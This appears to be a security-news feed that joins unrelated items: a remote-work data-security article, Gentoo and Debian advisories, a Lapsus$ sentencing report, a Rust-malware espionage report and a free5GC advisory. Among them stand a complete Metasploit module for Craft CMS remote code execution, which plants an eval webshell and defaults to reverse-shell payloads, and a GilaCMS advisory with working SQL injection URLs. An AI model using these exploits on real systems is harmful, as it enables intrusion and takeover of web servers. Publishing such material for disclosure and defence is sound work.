By Waqas
Work from home or WFH is a blessing for employees, but it can be a disguise when it comes to data security. Protecting yourself and your work infrastructure at home from cyberattacks is crucial.
This is a post from HackRead.com Read the original post: Top Data Security Issues of Remote Work

The surge in remote work has brought about intense concerns regarding data security including unsecured home networks and the increased use of personal devices pose significant challenges.

You’re living in an era where traditional office spaces are rapidly becoming a thing of the past. The advent of technology and the internet has brought about a paradigm shift in the way you work. This shift, however, has also ushered in new challenges, especially concerning data security. Data is the lifeblood of modern businesses, and its security should be a top priority.

The shift to remote work has only increased the need for robust data security measures. With employees accessing confidential information from a variety of locations and devices, the risk of data breaches has never been higher. Therefore, it’s important to understand these risks and implement effective measures to mitigate them.

In this article, you’ll explore the top data security issues of remote work and how to manage them effectively. Let’s begin.

****The Growth of Remote Work****

While the return-to-office initiative is on the rise, many organizations still allow remote or hybrid work arrangements. In 2023 alone, 28.2% of full-time employees use a hybrid approach, while 12.7% work from home. The flexibility offered by remote work is a big draw for many employees, and businesses are finding that it can also lead to increased productivity and cost savings.

However, as the number of remote workers increases, so does the risk of data security issues. Working from home often means using less secure home networks and personal devices, which can be a goldmine for cybercriminals. Furthermore, the lack of direct supervision makes enforcing corporate policies and regulatory requirements harder.

****Top Remote Work Data Security Issues****

One of remote work’s most significant data security issues is the risk of data breaches. In a traditional office setting, physical security measures can prevent unauthorized access to sensitive data. However, in a remote work setting, these measures are often absent. Moreover, the increased use of cloud services for collaboration and data storage also presents additional risks.

Another major issue is the vulnerability of home networks, which frequently lack the security measures found in corporate environments. Home networks, unlike corporate networks, frequently lack strict firewalls and antivirus software, making them a prime target. Cybercriminals can easily exploit these security flaws, putting personal information and data at risk. As a result, strengthening home network security is critical.

Other security issues to keep in mind include:

*   **Use of Personal Devices**: Remote employees frequently use personal devices for work, which can jeopardize data security. These devices may lack the same level of security as company-supplied equipment, making them more vulnerable to cyber threats and data breaches.
*   **Enforcing Corporate Policies and Regulatory Requirements** – Enforcing corporate policies and regulatory requirements is another major challenge with remote work. Ensuring compliance with data security policies can be difficult without the physical presence of supervisors and IT staff.
*   **Increased Risk of Phishing, Malware, and Social Engineering** – Remote workers are also more susceptible to phishing, malware, and social engineering attacks. These attacks often exploit human error and can lead to significant data breaches. Therefore, educating remote workers about these threats and how to avoid them is essential.
*   **Inadequate Secure Wi-Fi Networks**: Remote workers typically connect to corporate networks through unsecured or public Wi-Fi networks, which poses a significant security risk. Cybercriminals can easily exploit these networks by intercepting data transmission or injecting malware, potentially resulting in data breaches or system compromises. 

****Managing the Data Security Issues of Remote Work****

Regardless of these challenges, there are ways to effectively manage the data security issues associated with remote work. Implementing a data protection platform and zero-trust security controls are two of the most effective solutions.

A data protection platform is an essential component of today’s cybersecurity strategies. It offers a comprehensive solution for safeguarding sensitive data while meticulously monitoring and controlling data access. Its sophisticated mechanisms ensure that only authorized individuals have access to sensitive data, preserving data integrity and confidentiality. This platform is vital for preventing data breaches, improving regulatory compliance, and providing businesses with a secure digital environment.

Zero-trust security controls, on the other hand, are founded on a fundamental principle: by default, trust no user or device. Because of this, each access request is thoroughly verified before it can be approved. It is not a case of being overly suspicious, but of being proactive in terms of security. By scrutinizing every request, these controls significantly reduce the likelihood of data breaches. This method is extremely effective in preventing unauthorized access while also maintaining the integrity and confidentiality of sensitive data.

Other benefits of using data security tools for remote work include:

*   **Improved Visibility and Control:** Data security tools provide real-time visibility into all data movement, allowing businesses to monitor and control data access effectively.
*   **Improved Compliance:** These tools help to meet regulatory requirements by ensuring that data is handled and stored in a compliant manner, lowering the risk of penalties.
*   **Data Loss Risk is Reduced:** Data protection tools include features like automatic backups and encryption, which reduce the risk of data loss due to accidents or cyber-attacks.
*   **Advanced Threat Detection:** Some tools use artificial intelligence and machine learning to detect suspicious activity or anomalies, preventing potential breaches.
*   **Increased Productivity:** In a secure environment, employees can focus on their work without being concerned about potential data breaches, resulting in increased productivity.
*   **Improved Remote Work Security**: Data security tools include features like secure VPNs and multi-factor authentication, significantly enhancing network security by making it more difficult for unauthorized individuals to access sensitive information.
*   **Cost-Effective**: Implementing these tools can lead to long-term cost savings by preventing costly data breaches and reducing the time and resources spent on recovery after a breach.

Ultimately, remote work presents distinct data security challenges. These challenges, however, can be effectively managed with the right strategies and tools. A solid data protection platform that provides a secure foundation for your digital assets is extremely important.

Coupled with zero-trust security controls, you can ensure solid safeguards for your valuable data. These safeguards are essential to maintaining business continuity, especially in this day and age when remote work is becoming more common. With careful planning and implementation, you can weather the storm of data security threats in a remote work scenario.

****_RELATED ARTICLES_****

1.  **Top 3 data security risks facing businesses**
2.  **Data Security: Key Steps When Transferring Your Digital Workspace**
3.  **Data Security Threats to Businesses: Strategies to Strengthen Defense**
4.  **Nexo Achieves Type 2 SOC 2 Audit, Reinforces Data Security Compliance**
5.  **How cloud data distracts businesses from correct data security practices**

Top Data Security Issues of Remote Work

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular          content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability          allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity          of the application.          The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class          which allows to run arbitrary PHP code by escalating the object creation calling some methods available in          `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which          stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that          facilitates the reading of images, performance of image processing tasks, and writing of results back          to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the          Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the          malicious PHP code and gaining access to the system.          Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain          access to the underlying operating system as the user that the web services are running as (typically www-data).        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Thanh', # discovery          'chybeta' # poc        ],        'References' => [          [ 'CVE', '2023-41892' ],          [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],          [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],          [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-09-13',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def check_phpinfo    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'conditions/render',        'configObject[class]' => 'craft\elements\conditions\ElementCondition',        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'      }    })    if res && res.body      # parse HTML to find the upload directory and the document root provided by phpinfo command output      html = res.get_html_document      unless html.blank?        tr_items = html.css('tr td')        tr_items.each_with_index do |item, i|          next if tr_items[i + 1].nil?          if item.text.casecmp?('upload_tmp_dir')            if tr_items[i + 1].text.casecmp?('no value')              @config['upload_tmp_dir'] = '/tmp'            else              @config['upload_tmp_dir'] = tr_items[i + 1].text.strip            end          end          @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')        end      end    end  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s    end    # select webshell depending on the target setting (PHP or others).    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      # create the MSL payload      # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    else      # create the MSL payload      # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    end    # construct multipart form data with Imagick MSL payload    form_data = Rex::MIME::Message.new    form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')    form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')    form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')    form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    if res && res.code == 502      # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)      # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI']),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'action' => 'conditions/render',          'configObject[class]' => 'craft\elements\conditions\ElementCondition',          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"        }      })      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT      return res&.code == 502    end    false  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def on_new_session(session)    # cleanup webshell in DOCUMENT_ROOT    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.    if session.type == 'meterpreter'      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)      clean_files = session.fs.dir.entries    else      clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')    end    unless clean_files.blank?      clean_files.each do |f|        register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)      end    end    super  end  def check    check_phpinfo    return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    CheckCode::Safe  end  def exploit    # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo    check_phpinfo unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php, :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    end  endend

Craft CMS 4.4.14 Remote Code Execution

GilaCMS versions 1.15.4 and below suffer from multiple remote SQL injection vulnerabilities.

    Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabiltiesAffected CMS: GilaCMSAffected Version: <= 1.15.4CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1:After login into admin portal, go to administration>widget and use wiget area filter to perform searchSample payload:http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20Attack Vector 2:After login into admin portal, go to edit post/page/role/user/category/userpostSample payload:http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_updatehttp://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_updateAttacker Vector 3:After login into admin portal, go to Content>Posts and use Users filter to perform searchSample payload:http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20RecommendationUpdate to v2.0.1http://gilacms.comhttps://github.com/GilaCMS/gilahttps://github.com/GilaCMS/gila/security/policy

GilaCMS 1.15.4 SQL Injection

Gentoo Linux Security Advisory 202312-8 - A vulnerability has been found in LibRaw where a heap buffer overflow may lead to an application crash. Versions greater than or equal to 0.21.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibRaw: Heap Buffer Overflow  
     Date: December 22, 2023  
     Bugs: #908041  
       ID: 202312-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in LibRaw where a heap buffer overflow  
may lead to an application crash.

Background  
=========  
LibRaw is a library for reading RAW files obtained from digital photo  
cameras.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libraw  < 0.21.1-r1   >= 0.21.1-r1

Description  
==========  
A vulnerability has been discovered in LibRaw. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted  
file may lead to an application crash.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibRaw users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libraw-0.21.1-r1"

References  
=========  
[ 1 ] CVE-2023-1729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1729

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-08

Debian Linux Security Advisory 5586-1 - Several vulnerabilities have been discovered in OpenSSH, an implementation of the SSH protocol suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5586-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 22, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssh  
CVE ID         : CVE-2021-41617 CVE-2023-28531 CVE-2023-48795 CVE-2023-51384  
                 CVE-2023-51385  
Debian Bug     : 995130 1033166

Several vulnerabilities have been discovered in OpenSSH, an  
implementation of the SSH protocol suite.

CVE-2021-41617

    It was discovered that sshd failed to correctly initialise  
    supplemental groups when executing an AuthorizedKeysCommand or  
    AuthorizedPrincipalsCommand, where a AuthorizedKeysCommandUser or  
    AuthorizedPrincipalsCommandUser directive has been set to run the  
    command as a different user. Instead these commands would inherit  
    the groups that sshd was started with.

CVE-2023-28531

    Luci Stanescu reported that a error prevented constraints being  
    communicated to the ssh-agent when adding smartcard keys to the  
    agent with per-hop destination constraints, resulting in keys being  
    added without constraints.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

CVE-2023-51384

    It was discovered that when PKCS#11-hosted private keys were  
    added while specifying destination constraints, if the PKCS#11  
    token returned multiple keys then only the first key had the  
    constraints applied.

CVE-2023-51385

    It was discovered that if an invalid user or hostname that contained  
    shell metacharacters was passed to ssh, and a ProxyCommand,  
    LocalCommand directive or "match exec" predicate referenced the user  
    or hostname via expansion tokens, then an attacker who could supply  
    arbitrary user/hostnames to ssh could potentially perform command  
    injection. The situation could arise in case of git repositories  
    with submodules, where the repository could contain a submodule with  
    shell characters in its user or hostname.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:8.4p1-5+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:9.2p1-2+deb12u2.

We recommend that you upgrade your openssh packages.

For the detailed security status of openssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWFTwlfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S6PRAAkBJzc/CFQgXLtms7bom/Vw750vvqEVhj7ojOPHbmpoppVIjFR768C5Z6  
AO5HiP/uH1tk0x2zejbPhXRgLK/2PEuCTA/4w7UeTzYIGve3IVKVgNs+/sgWQBuK  
M1xj8zL1PLkRi6rSXAvGpTxqdCtWC61AWHOl1Q03w3usilETJKDsulOBb9sQ9Uid  
xSRxDUAS//gyRdW+K3D9HsPYJAW/oSu4tJO+UXI1WJTDY1N/i0cq7yH16YXzbEcV  
dhttLyR5fWx000fSsaaWXgYUS2sSYUfOKPfw4xdePpdeBYNumnpehjfCED5C61EQ  
os4uvEDi15X8M599/+u0oLVJJFXVSfZ4W1ecFWcFAvMny70F0s1a7AxQCcN3sXkt  
kLAuOXJHmmhBeqSj1kVKoLcg4WSlCdglRr6KgiXqUVvfUBsWhseoyGJ3jST3PQcZ  
70/lIJofavLJdFQHlPTXs7lDnFttgzuB3xE5wM7TeXs5L2l9QI0W64YCtWthqApL  
c7KjPGmAx7xYOOp+aHclsP74nBVZs6tcvHPf9Y/1OK30XkoMbuW0+oH1rCu6EGs0  
F6Th1FneTwRN2NEhzpQMr+34m0T8H7oymiQmi9C+ZDhCBDRcpN4sATYNh70Y/t6y  
i8k/vZcCCfLxQgdiay5JJCWJPf1pvvmPbgMLs4WVELr/6E9xIR0=2W//  
-----END PGP SIGNATURE-----

Debian Security Advisory 5586-1

By Deeba Ahmed
From Teen Prodigy to Cybercriminal: The Fall of a Lapsus$ Gang Member and the Dangers of the Online Underworld.
This is a post from HackRead.com Read the original post: GTA 6 Hacker from Lapsus$ Gang Sentenced to Hospital

Arion Kurtaj, a 17-year-old from the United Kingdom, faced accusations of being part of the Lapsus$ gang, hacking industry giants, including Uber, Rockstar Games, Nvidia, BT, Samsung, and others.

In July 2023, **Hackread.com reported** that two UK teenagers, 17-year-old Arion Kurtaj and an unnamed 18-year-old hacker, were facing trial for computer misuse, blackmail, and fraud against BT Group Plc and Nvidia.

The duo was accused of stealing sensitive data and demanding ransom money. Now, one of the accused, Kurtaj, has been sentenced, but due to his autism, he has received an indefinite hospital order for **leaking clips** of Grand Theft Auto 6 (GTA 6), an upcoming game from Rockstar Games.

GTA images and videos plus internal software (Image: Waqas – Hackread.com)

Kurtaj was identified as a key member of the infamous **Lapsus$ cybercrime gang**, known for launching devastating cyberattacks against tech giants such as Uber, Nvidia, and Rockstar Games. The gang executed cyberattacks between August 2020 and September 2022, targeting telecoms, computer parts manufacturers, and gaming companies.

According to Rockstar Games’ testimony during the trial, the hack orchestrated by Lapsus$ cost them $5 million to recover from, contributing to the overall financial impact of nearly $10 million on the targeted companies.

**Reportedly**, Kurtaj had been violent while in custody, with dozens of reports of injury or property damage. Doctors deemed him unfit to stand trial due to his severe autism, so the jury at a Southwark crown court was asked to determine whether he committed the alleged acts without criminal intent.

Considering Kurtaj’s skills and inclination to commit cybercrime, the judge deemed him a high risk to public safety. Consequently, he will be held at a secure hospital for life unless doctors determine he is no longer a danger. A mental health assessment was conducted as part of the sentencing process. Shockingly, it was revealed during the hearing that Kurtaj continued hacking while on bail, targeting major entities like Nvidia and BT/EE even under police protection at a Travelodge hotel.

Reportedly, he breached Rockstar, the company behind GTA, using an Amazon Firestick, hotel TV, and mobile phone to hack its internal Slack messaging system. He stole 90 unreleased clips and threatened to release the source code if Rockstar didn’t contact him on Telegram within 24 hours. Kurtaj posted the clips and source code on a forum under the username TeaPotUberHacker. **He was rearrested** and detained until his trial.

Uber hacker ”TeaPotUberHacker” on GTA forums announcing GTA 6 hack and leaking its data (Image: Waqas – Hackread.com)

Contrary to reports, cybersecurity researcher Robert Graham asserts that claims of Kurtaj using just an Amazon Firestick to breach the gaming giant are inaccurate and exaggerated. Graham contends that the hacker employed his phone for this purpose.

“Specifically, he connected his phone to the TV and its Bluetooth keyboard, through the FireTV stick. This made things more convenient when accessing the Internet from his phone, but was by no means such things were essential,” tweeted Graham.

> Cybersecurity expert here: no.
> 
> The stories of teenage hacking are sensationalized.
> 
> As far as we can tell, he didn't hack into the company using a FireTV stick. He accessed the company using his phone.
> 
> Specifically, he connected his phone to the TV and its bluetooth keyboard,… https://t.co/N2a5w8U369
> 
> — Robᵉʳᵗ Graham 𝕏 (@ErrataRob) December 22, 2023

In a separate development, a 17-year-old member of the Lapsus$ gang was found guilty of two counts of fraud, two Computer Misuse Act offences, and one count of blackmail by Guildford Crown Court in Surrey. He was sentenced to a youth rehabilitation order, which includes 18 months of supervision, six months of rehabilitation, and three months of intensive supervision and surveillance.

The cases highlight the dangers young people can face online and the serious consequences it can have on their future, stated DCS Amanda Horsburgh, from the City of London police.

“Unfortunately, the digital world can also be tempting to young people for the wrong reasons,” Horsburgh added.

Hackread.com has followed UK law enforcement’s crackdown against the Lapsu$ gang members and those behind high-profile security breaches. In September 2022, Hackread reported the arrest of a 17-year-old teen from Oxfordshire by the City of London Police for their suspected link with Uber and Rockstar Games’ breaches.

****_RELATED ARTICLES_****

1.  Hackers remotely interrupting GTA Online PC Gameplay
2.  LAPSUS$ Hackers Leak Claim to Breach Microsoft and Okta
3.  Russian Hacker Exploits GTA 5 PC Mod to Install Crypto Miner
4.  Lapsus$ Hackers Stole T-Mobile’s Source Code, Systems Data
5.  Authorities seize properties of GTA V’s “Infamous” cheat developers
6.  Samsung confirms data breach as Lapsus$ hackers leak source code

GTA 6 Hacker from Lapsus$ Gang Sentenced to Hospital

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.
The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.
"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.

The activity, first detected in October 2023, has been codenamed **Operation RusticWeb** by enterprise security firm SEQRITE.

"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said.

Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.

SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives susceptible to CVE-2023-38831 for malware delivery, enabling unbridled remote access and control.

"The SideCopy APT Group's infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise," ThreatMon noted earlier this year.

The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.

Besides amassing files of interest, the malware is equipped to collect system information and transmit them to the C2 server but lacks the features of other advanced stealer malware available in the cybercrime underground.

A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.

But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name "Cisco AnyConnect Web Helper." The gathered information is ultimately uploaded to oshi\[.\]at domain, an anonymous public file-sharing engine called OshiUpload.

"Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups," Ram Prakki said.

The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.

The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.

The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim's location.

"The DoNot group's relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India," Cyble said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities

An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.

**free5GC AMF denial of service vulnerability**

High severity GitHub Reviewed Published Dec 22, 2023 to the GitHub Advisory Database • Updated Dec 22, 2023

GHSA-jcrr-rr6w-8c83: free5GC AMF denial of service vulnerability

